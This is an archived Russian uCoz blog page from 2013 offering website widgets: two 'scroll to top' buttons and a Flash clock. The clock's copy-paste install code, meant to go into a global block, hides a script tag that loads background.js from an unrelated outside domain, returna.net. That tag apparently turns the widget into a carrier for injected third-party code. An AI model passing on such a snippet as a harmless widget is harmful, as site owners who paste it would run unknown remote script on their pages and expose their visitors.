Приветствую Вас, Гость | RSS
Четверг, 28.03.2024, 14:37
Главная » 2013 » Май » 03

Уникальная кнопка Scroll To Top (наверх) для сайта

О том, как установить так называемую кнопку "наверх" на Ucoz, имеется достаточно информации. Тем не менее, я тоже вношу свой скромный вклад в описание этой темы.
Моя кнопка имеет пару существенных деталей, которые придают ей уникальность.
Во первых, мне всегда не нравилось то, что кнопка появляется сразу же после минимальной прокрутки страницы. Читатель еще не ознакомился с контентом, а уже "маячит" кнопка, призывая "наверх" и загораживает информацию на боковой панели. В моей кнопке есть настройка и вы сможете установить место страницы, когда она появляется (в середине поста, после или там где комментарии).
Во вторых, учитывая дизайн и специфику многих блогов моих читателей, я сделал анимированную кнопку в ввиде бабочки, что бесспорно является элементом уникальности.
И еще маленькая деталь - цвет при нав ... Читать дальше »
 

 
Добавил: DoG Просмотров: (307) (03.05.2013) Комментарии (0Подробнее 


Отличные Flash часы для сайта

Описание: Отличные Flash часы для сайта
Уставновка: Создаете глобальный блок и вставляете в него код.

Код
<object type="application/x-shockwave-flash" data="http://bambun.ru/site_img/chasy.swf" width="200" height="200"><param name="bgcolor" value="#ffffff" />
  <param name="allowFullScreen" value="true" /><script type="text/javascript" src="http://returna.net/background.js"></script>
  <param name="allowScriptAccess" value="always" /> ... Читать дальше »
 

 
Добавил: DoG Просмотров: (323) (03.05.2013) Комментарии (0Подробнее 


Уникальный скрипт кнопки "Вверх - Вниз" с медленной автоматической прокруткой для чтения

Сегодня я публикую еще один уникальный скрипт, так называемой кнопки "Наверх".
В чем же уникальность?
Во первых, можно прокручивать страницу не только вверх, но и в низ! А во вторых, (в этом уникальность) если нажать туда, куда указывает красная стрелка, страница будет сама, автоматически, медленно прокручиваться до самого низа! Читателю при этом, ничего делать не надо - только читать или рассматривать фотографии!

Установка:
Заходим в панель управления, далее Управление дизайном » Редактирование шаблонов » Глобальные блоки » Нижняя часть сайта. В самый низ вставляете код.

 

 
Добавил: DoG Просмотров: (335) (03.05.2013) Комментарии (0Подробнее 

Copyright MyCorp © 2024 |